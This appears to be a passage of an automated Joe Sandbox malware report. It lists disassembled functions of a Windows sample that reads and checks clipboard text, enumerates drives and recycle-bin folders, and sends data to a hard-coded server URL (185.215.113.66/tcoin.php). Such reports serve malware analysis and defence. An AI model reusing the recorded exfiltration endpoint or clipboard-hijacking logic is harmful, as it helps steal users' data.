                                                                                                                    • Instruction Fuzzy Hash: A5F09E32A84308F7EB1067E19D0FB397574AB04B92F504452F706A90D1DEA5A6019B69
                                                                                                                    Function 00AF1300 Relevance: 13.6, APIs: 9, Instructions: 125COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 44 af1300-af1325 call af1ff0 _wfopen 47 af151b-af1520 44->47 48 af132b-af1345 fgetws 44->48 49 af150f-af1518 fclose 48->49 50 af134b-af1391 call af11b0 call af1120 48->50 49->47 56 af150a 50->56 57 af1397-af13aa 50->57 56->48 58 af1505 57->58 59 af13b0-af13ea memset wcstok 57->59 58->56 60 af13f4-af13fb 59->60 61 af13fd-af1410 60->61 62 af144b-af1466 call af1280 60->62 61->62 63 af1412-af1449 wcstok 61->63 66 af146c-af1499 memset 62->66 67 af1503 62->67 63->60 68 af14aa-af14b6 66->68 67->56 69 af14b8-af14bf 68->69 70 af14f4-af1500 call af10a0 68->70 71 af14d5-af14f2 wcscat 69->71 72 af14c1-af14d2 wcscat 69->72 70->67 71->68 72->71
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspacememsetwcscatwcstok$_wfopenfclosefgetws
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3041731120-0
                                                                                                                    • Opcode ID: 4635a2c55bb20dc653972706a9c0d92a5b0d64a02e21f3096273cefd1cfd988d
                                                                                                                    • Instruction ID: 9d7780370b0af99d95ad81132fb609353a4197864e98f20d671eadadf32941af
                                                                                                                    • Opcode Fuzzy Hash: 4635a2c55bb20dc653972706a9c0d92a5b0d64a02e21f3096273cefd1cfd988d
                                                                                                                    • Instruction Fuzzy Hash: 965167B1D0021CDADB20DB90DD42BE973B8AB50300F00C5A5F60966241EB359B9ADFE2
                                                                                                                    Function 00AF1000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00AF101A
                                                                                                                    • wsprintfW.USER32 ref: 00AF1033
                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 00AF1043
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00AF1069
                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 00AF1085
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                    • String ID: %s\8f8e8e8f8xxx.txt$%temp%
                                                                                                                    • API String ID: 750032643-893534847
                                                                                                                    • Opcode ID: d1f5b7309d5eab995c23820a4e148d0fc43491c91903b1604a9187280f3f2088
                                                                                                                    • Instruction ID: ed951e1cddb021ce668add8ecb8985dbb9fe4e64b46ce4d083a53bd3cb4a0894
                                                                                                                    • Opcode Fuzzy Hash: d1f5b7309d5eab995c23820a4e148d0fc43491c91903b1604a9187280f3f2088
                                                                                                                    • Instruction Fuzzy Hash: C8014FB554031CBBDB20DBE09C4AFF67338AB44704F0046A4B719A60D1DFB05AC9CBA5
                                                                                                                    Function 00AF1E10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 82 af1e10-af1e3b GetLogicalDrives 83 af1e46-af1e4a 82->83 84 af1e4c-af1e6c RegOpenKeyExW 83->84 85 af1eb6-af1ec1 83->85 86 af1e6e-af1e99 RegQueryValueExW 84->86 87 af1eb4 84->87 88 af1e9b-af1e9f 86->88 89 af1eaa-af1eae RegCloseKey 86->89 87->83 88->89 91 af1ea1-af1ea7 88->91 89->87 91->89
                                                                                                                    APIs
                                                                                                                    • GetLogicalDrives.KERNELBASE ref: 00AF1E16
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00AF1E64
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00AF1E91
                                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 00AF1EAE
                                                                                                                    Strings
                                                                                                                    • NoDrives, xrefs: 00AF1E88
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00AF1E57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                    • Opcode ID: f6cb62b2d6ae3b84dfc9799ea7cc594aca4a27aa18bf8078067b0dbdfaa8953c
                                                                                                                    • Instruction ID: 16f92f1b3dccb11cae8b044d2f84a2eecd3b0629e5b7634fdf1325bb735aba4d
                                                                                                                    • Opcode Fuzzy Hash: f6cb62b2d6ae3b84dfc9799ea7cc594aca4a27aa18bf8078067b0dbdfaa8953c
                                                                                                                    • Instruction Fuzzy Hash: 6311B7B5E4020EEBDF10CFD0C949BFEBBB4BB48704F108549EA12A6280D7786A45CB95
                                                                                                                    Function 00AF1D90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 92 af1d90-af1db6 GetDriveTypeW 93 af1db8-af1dbf 92->93 94 af1e05-af1e0b 92->94 95 af1dcc-af1de4 QueryDosDeviceW 93->95 96 af1dc1-af1dc8 93->96 95->94 98 af1de6-af1dfc StrCmpNW 95->98 96->95 97 af1dca 96->97 97->94 98->94 99 af1dfe 98->99 99->94
                                                                                                                    APIs
                                                                                                                    • GetDriveTypeW.KERNELBASE(00AF1D6F), ref: 00AF1D9D
                                                                                                                    • QueryDosDeviceW.KERNELBASE(00AF1D6F,?,00000208), ref: 00AF1DDC
                                                                                                                    • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00AF1DF4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                    • String ID: \??\
                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                    • Opcode ID: a72f062ce78dd2daa5b1d401e1b77346f27ccabf3913e4e43b5c388df2925727
                                                                                                                    • Instruction ID: 9db049420839bfb50c95da1bdbfad6aae49b6320c9802c5fdd4d00995e3820d0
                                                                                                                    • Opcode Fuzzy Hash: a72f062ce78dd2daa5b1d401e1b77346f27ccabf3913e4e43b5c388df2925727
                                                                                                                    • Instruction Fuzzy Hash: 7E01BFB594021CEBCF24DFD5CD49AF9B7B4AB04705F0085A9FB09A7140E6709B85CF95
                                                                                                                    Function 00AF1ED0 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 100 af1ed0-af1ee5 call af1e10 103 af1ef0-af1ef4 100->103 104 af1f2f-af1f31 ExitThread 103->104 105 af1ef6-af1f17 call af1d30 103->105 108 af1f2d 105->108 109 af1f19-af1f1d 105->109 108->103 110 af1f1f 109->110 111 af1f21-af1f25 call af1a20 109->111 110->108 114 af1f2a 111->114 114->108
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00AF1E10: GetLogicalDrives.KERNELBASE ref: 00AF1E16
                                                                                                                      • Part of subcall function 00AF1E10: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00AF1E64
                                                                                                                      • Part of subcall function 00AF1E10: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00AF1E91
                                                                                                                      • Part of subcall function 00AF1E10: RegCloseKey.KERNELBASE(?), ref: 00AF1EAE
                                                                                                                    • ExitThread.KERNEL32 ref: 00AF1F31
                                                                                                                      • Part of subcall function 00AF1D30: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00AF1D83
                                                                                                                      • Part of subcall function 00AF1A20: memset.MSVCR90 ref: 00AF1A65
                                                                                                                      • Part of subcall function 00AF1A20: memset.MSVCR90 ref: 00AF1A7B
                                                                                                                      • Part of subcall function 00AF1A20: PathCombineW.SHLWAPI(?,$recycle.bin,00AFA260), ref: 00AF1A93
                                                                                                                      • Part of subcall function 00AF1A20: FindFirstFileW.KERNELBASE(?,?), ref: 00AF1AA7
                                                                                                                      • Part of subcall function 00AF1A20: lstrcmpW.KERNEL32(?,00AFA264), ref: 00AF1AD7
                                                                                                                      • Part of subcall function 00AF1A20: lstrcmpW.KERNEL32(?,00AFA268), ref: 00AF1AED
                                                                                                                      • Part of subcall function 00AF1A20: PathCombineW.SHLWAPI(?,$recycle.bin,?), ref: 00AF1B09
                                                                                                                      • Part of subcall function 00AF1A20: FindNextFileW.KERNELBASE(000000FF,?), ref: 00AF1CE8
                                                                                                                      • Part of subcall function 00AF1A20: CloseHandle.KERNELBASE(000000FF), ref: 00AF1CFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCombineFileFindPathlstrcmpmemset$DrivesExitFirstHandleLogicalNextOpenQueryThreadValuelstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 717983626-0
                                                                                                                    • Opcode ID: 0f5492295b189abcb5616638b1c4f50d4834105057a040687c611b5dbc20af85
                                                                                                                    • Instruction ID: 7666d4e5786e5057bdd2857d0ccf3b75454f7d5f976cd14d947f1debf16c20b3
                                                                                                                    • Opcode Fuzzy Hash: 0f5492295b189abcb5616638b1c4f50d4834105057a040687c611b5dbc20af85
                                                                                                                    • Instruction Fuzzy Hash: AA013CB5C1424CEBCB00EBE4C9469FEB7B5AB08304F1040AAFA05B3201E7369A44CB65
                                                                                                                    Function 00AF1D30 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 115 af1d30-af1d4a 116 af1d4c-af1d6a call af1d90 115->116 117 af1d89-af1d8f 115->117 119 af1d6f-af1d79 116->119 119->117 120 af1d7b-af1d83 lstrcpyW 119->120 120->117
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00AF1D90: GetDriveTypeW.KERNELBASE(00AF1D6F), ref: 00AF1D9D
                                                                                                                    • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00AF1D83
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DriveTypelstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664088370-0
                                                                                                                    • Opcode ID: 4bab01280aedf6ea1ad2d5ee931739efa0a698e25a99249288ff752e72ccc097
                                                                                                                    • Instruction ID: d494e1faecdfc4e58a225fc0f2d7da48cbb4a146c619c065418cd4ffc8080fc6
                                                                                                                    • Opcode Fuzzy Hash: 4bab01280aedf6ea1ad2d5ee931739efa0a698e25a99249288ff752e72ccc097
                                                                                                                    • Instruction Fuzzy Hash: CFF0677590020CFBCB04DFE8D855BEDB7B8EF44304F00C4A9E8189B240E636AB08CB85

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00AF1530 Relevance: 37.8, APIs: 25, Instructions: 292clipboardCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 170 af1530-af155c OpenClipboard 171 af155e-af1560 170->171 172 af1565-af1574 GetClipboardData 170->172 173 af19f5-af19f8 171->173 174 af1576-af157e CloseClipboard 172->174 175 af1583-af159a GlobalLock 172->175 174->173 176 af159c-af15a4 CloseClipboard 175->176 177 af15a9-af15f1 memset 175->177 176->173 178 af1602-af160d 177->178 179 af16e3-af16e9 178->179 180 af1613-af1627 iswspace 178->180 181 af171e-af1735 GlobalUnlock CloseClipboard 179->181 182 af16eb-af1701 179->182 183 af162d-af1633 180->183 184 af16c6-af16cc 180->184 188 af175f-af1791 wsprintfW wcscmp 181->188 189 af1737-af173e 181->189 182->181 187 af1703-af171b wcscat_s 182->187 190 af1639-af1653 183->190 191 af16c4 183->191 185 af16de 184->185 186 af16ce-af16d8 184->186 185->178 186->185 187->181 194 af179a-af1874 wsprintfW call af1a00 wcstok call af1a00 * 2 wcstok * 3 188->194 195 af1793-af1795 188->195 189->188 193 af1740-af1747 189->193 196 af1655-af16a1 wcsncat_s wcscat_s 190->196 197 af16a4-af16ab 190->197 191->185 193->188 198 af1749-af1750 193->198 208 af1885-af188f 194->208 195->173 196->197 197->191 200 af16ad-af16bf GlobalUnlock CloseClipboard 197->200 198->188 201 af1752-af1759 198->201 200->173 201->188 203 af19f3 201->203 203->173 209 af18b8-af18bf 208->209 210 af1891-af18b0 wcscmp 208->210 213 af19ef-af19f1 209->213 214 af18c5-af18cf 209->214 211 af18b6 210->211 212 af18b2 210->212 211->208 212->211 213->173 216 af18e0-af18ea 214->216 217 af18ec-af190b wcscmp 216->217 218 af1916-af1920 216->218 220 af190d 217->220 221 af1914 217->221 218->213 219 af1926-af1930 218->219 222 af1941-af194b 219->222 220->221 221->216 224 af194d-af196c wcscmp 222->224 225 af1977-af1981 222->225 226 af196e 224->226 227 af1975 224->227 225->213 228 af1983-af198d 225->228 226->227 227->222 230 af199e-af19a8 228->230 231 af19aa-af19c9 wcscmp 230->231 232 af19d4-af19de 230->232 233 af19cb 231->233 234 af19d2 231->234 232->213 235 af19e0-af19ec call af10a0 232->235 233->234 234->230 235->213
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00AF1554
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00AF1567
                                                                                                                    • CloseClipboard.USER32 ref: 00AF1576
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2058664381-0
                                                                                                                    • Opcode ID: e9ef8cc6a9275148f1a4c6a8000bb0212b07e40422105a498246a44cbafea695
                                                                                                                    • Instruction ID: 6329021bf56cbdd6961bd8197854085d5e855de7d9381c3116f185964b6992de
                                                                                                                    • Opcode Fuzzy Hash: e9ef8cc6a9275148f1a4c6a8000bb0212b07e40422105a498246a44cbafea695
                                                                                                                    • Instruction Fuzzy Hash: 9BC17CB1D0022CDBEF20DBA4CD91BB9B7B4BF15300F0485D9E68966241EA719B85CFE4
                                                                                                                    Function 00AF10A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • wsprintfW.USER32 ref: 00AF10B9
                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AF10CF
                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00AF10FA
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00AF1107
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00AF1114
                                                                                                                    Strings
                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00AF10CA
                                                                                                                    • http://185.215.113.66/tcoin.php?s=%s, xrefs: 00AF10AD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpen$wsprintf
                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://185.215.113.66/tcoin.php?s=%s
                                                                                                                    • API String ID: 1691607147-1762395284
                                                                                                                    • Opcode ID: 82fbed455ab62609f1c2249bbc8f68b1ac43c533e3a002f28536da4314eb1a15
                                                                                                                    • Instruction ID: bd06c8c9b65459c23b774f7ac68e15696b02f047e1b9c1d654567dd6533f4bec
                                                                                                                    • Opcode Fuzzy Hash: 82fbed455ab62609f1c2249bbc8f68b1ac43c533e3a002f28536da4314eb1a15
                                                                                                                    • Instruction Fuzzy Hash: D101FF75E80319BBDF25DFD8DD09FBA7778EB04701F100598B609661C0D6706B45CB59

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BADB0F8 Relevance: .2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2160882544.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 626baece6ba9cbfe1a2a9e6b2bdb2ce56552700b91dd160ad05d322938b36383
                                                                                                                    • Instruction ID: 73e66e3c8c17ede3cfaca7cd90ddfe65d9f01e2d63bfd93ce3d9ebc52b58a9b4
                                                                                                                    • Opcode Fuzzy Hash: 626baece6ba9cbfe1a2a9e6b2bdb2ce56552700b91dd160ad05d322938b36383
                                                                                                                    • Instruction Fuzzy Hash: A7410A3190CB4C4FDB5C9B5C984A7E97BE0EB95321F00422FE049C3592DA756456CBC2
                                                                                                                    Function 00007FFD9BADB028 Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2160882544.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c97644f42c810b5899612aed743a3f5a80b3e76b76caecba7dab9f8c2c4c4439
                                                                                                                    • Instruction ID: 030dc27c9b236d10cba57ecd4c37bef11aac846878f640c37433b6aef1da5e43
                                                                                                                    • Opcode Fuzzy Hash: c97644f42c810b5899612aed743a3f5a80b3e76b76caecba7dab9f8c2c4c4439
                                                                                                                    • Instruction Fuzzy Hash: AF31273190C74C8EEB58DF9C984A7E97BE0EB96331F04426FD04CC7152D674641ACB91
                                                                                                                    Function 00007FFD9BADA0E5 Relevance: .1, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2160882544.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f84353de5e809cbba91d8512dff24c9a9762d1ba6c0801ae36ac78502bb3dec0
                                                                                                                    • Instruction ID: ccd800a55b1670051f9e0390583058fcf08b44c99daff4b32a13af19f116460e
                                                                                                                    • Opcode Fuzzy Hash: f84353de5e809cbba91d8512dff24c9a9762d1ba6c0801ae36ac78502bb3dec0
                                                                                                                    • Instruction Fuzzy Hash: 7131083191CB4C8FDB58DB5CDC4A6A97BE0FBA9320F00426FE449C3252DA74A855CBC2
                                                                                                                    Function 00007FFD9B9BE380 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2160248062.00007FFD9B9BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9BD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b9bd000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 240b166d4b96cf636865dd4dfd0a8120570eaa069cde2af0da76272048f667ca
                                                                                                                    • Instruction ID: 07fda9590421519742edf94285bd7c9dff348ae61a87aee6da8af2516fdcbe47
                                                                                                                    • Opcode Fuzzy Hash: 240b166d4b96cf636865dd4dfd0a8120570eaa069cde2af0da76272048f667ca
                                                                                                                    • Instruction Fuzzy Hash: 9F41387191EFC85FE7A6CB2898559523FF0EF52310B1605EFD088CB1A3D625E846CB92
                                                                                                                    Function 00007FFD9BAD4675 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2160882544.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
                                                                                                                    • Instruction ID: 65a9837cf265c2c908ca4e5bc3a4c9dcd9009e6d656558e1b2ef0700ac6ad077
                                                                                                                    • Opcode Fuzzy Hash: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
                                                                                                                    • Instruction Fuzzy Hash: 1C01847020CB0C4FD748EF0CE051AA5B3E0FB85360F10066EE58AC36A1DA32E881CB45
                                                                                                                    Function 00007FFD9BADAE68 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.2160882544.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 996445b9244b70b5463d8174cc5747e3f56f0a0953b0e73921b0615144be9a4c
                                                                                                                    • Instruction ID: e829bdfa9a9eef8e36a623794851144025ba83be84ed9edea5244f8664de9bc4
                                                                                                                    • Opcode Fuzzy Hash: 996445b9244b70b5463d8174cc5747e3f56f0a0953b0e73921b0615144be9a4c
                                                                                                                    • Instruction Fuzzy Hash: 8FF0E23190868D8FCB0AEF6888659E57FA0FF66310B0502DBE459C71B2DB749958CBC2
                                                                                                                    Function 00007FFD9BBA4A1D Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
